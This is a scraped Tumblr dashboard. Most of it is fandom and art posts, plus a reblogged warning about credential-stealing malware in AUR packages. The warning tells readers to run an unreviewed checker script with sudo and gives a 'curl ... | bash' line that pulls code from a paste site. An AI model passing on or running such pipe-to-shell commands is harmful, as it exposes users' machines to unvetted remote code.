calls for Asamiyacha @newsfromthegutter - Tumblr Blog

Tumblr gifmakers are better than $1mil worth of marketing. I’ll see endless ads for a show and be like meh but I’ll see one good gifset and suddenly I’m on s2 ep10 finding blorbo from my gifs

proxmox-official

AUR has been hit with malware

Per the CachyOS subreddit:

"As the title states, the Arch AUR has been hit by a huge malware infection campaign over the last couple of days. There's an earlier post referring to alvr. That's not the only package it's hundreds of them, many of them Aur packages average people would install like apple-music-desktop.

I don't have the full details of the scope of the malware campaign. I know it's a credential stealer so it steals ssh keys and browser login info and apparently has rootkit potential.

This was widespread and targeted orphaned packages. Aur for some reason allows other people to take over existing projects.

The bottom line is if you used the aur over the last couple of days you may have been infected and the problem with taking over orphaned packages I believe remains. I personally would not use the Aur for the foreseeable future, and ideally not at all. It's a security risk."

There is a script that you can run on your machine to detect if you have a package that is known to have been infected which you can view here. I have also linked the subreddit post here.

Just download it, make it executable and run the script with sudo and let it run, it will tell you what it found once it's complete.

Pls reblog to signal boost!!

proxmox-official

Per the thread again: As I was interested in more in-depth information some can be found here, as well as a preliminary analysis of the malware:

https://www.sonatype.com/blog/atomic-arch-npm-campaign-adds-malicious-dependency

https://ioctl.fail/preliminary-analysis-of-aur-malware/

Users can also run the following to check for malicious packages:

curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash

utopicwork

Remember to read any scripts from online before you execute them

paradigm-adrift

aur naur

#aur naur.....#*insert sensible chuckle gif*

blue0909

Please stop being nonbinary too. God only created one gender. You must conform to that.

THERES ONLY ONE NOW?????

miketon

artvaris

A Ko-fi portrait commission for MidnightSun, portraying a dragon witch OC named Iwona

#art

literary-sparks

“Why don’t you use ai” idk man beyond the obvious environmental and “this machine causes psychosis and encourages people to kill themselves” thing I think asking the equivalent of a solid D student who is also a pathological liar if they can answer my question/do the work for me seems pretty fucking stupid

sandstone72

They should make a content label for ai posts like they do for mature content so I dont ever have to fucking look at it

clairedsfield

sdl ep. 584

#no heterosexual explanation #sdl

clairedsfield

sdl ep. 584

#I'm scared #also this is insane and super gay #did they plan this for pride month #sdl

sdl ep. 584

#Fina's outfits top tier #sdl

clairedsfield

sdl ep. 584

#the power flirty!Fina has goodness gracious #no wonder they needed her to tone it down in all these past episodes because DAMN #sdl

waverlyyhaught

Favorite Marta and Fina Moments - Part 200 Sueños de Libertad, Ep. 575 Watch the scene here

#playful mafin is back let's goooooooo #sdl

clairedsfield

sdl ep. 584

what is your eye color. what is your favorite color. what is the color that appears most frequently in your wardrobe. what color is your favorite blanket. what color is your water bottle.

#blue. blue. blue&grey. blue&green. grey #maybe it's time to branch out😂

reginasphalanges

HAPPY PRIDE MONTH!

PARKS AND RECREATION 2.01 Pawnee Zoo

Trending Blogs

Recently Viewed Blogs

calls for Asamiyacha